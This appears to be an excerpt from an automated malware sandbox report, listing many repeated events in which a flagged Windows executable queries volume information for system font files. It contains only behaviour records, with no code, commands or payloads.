                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
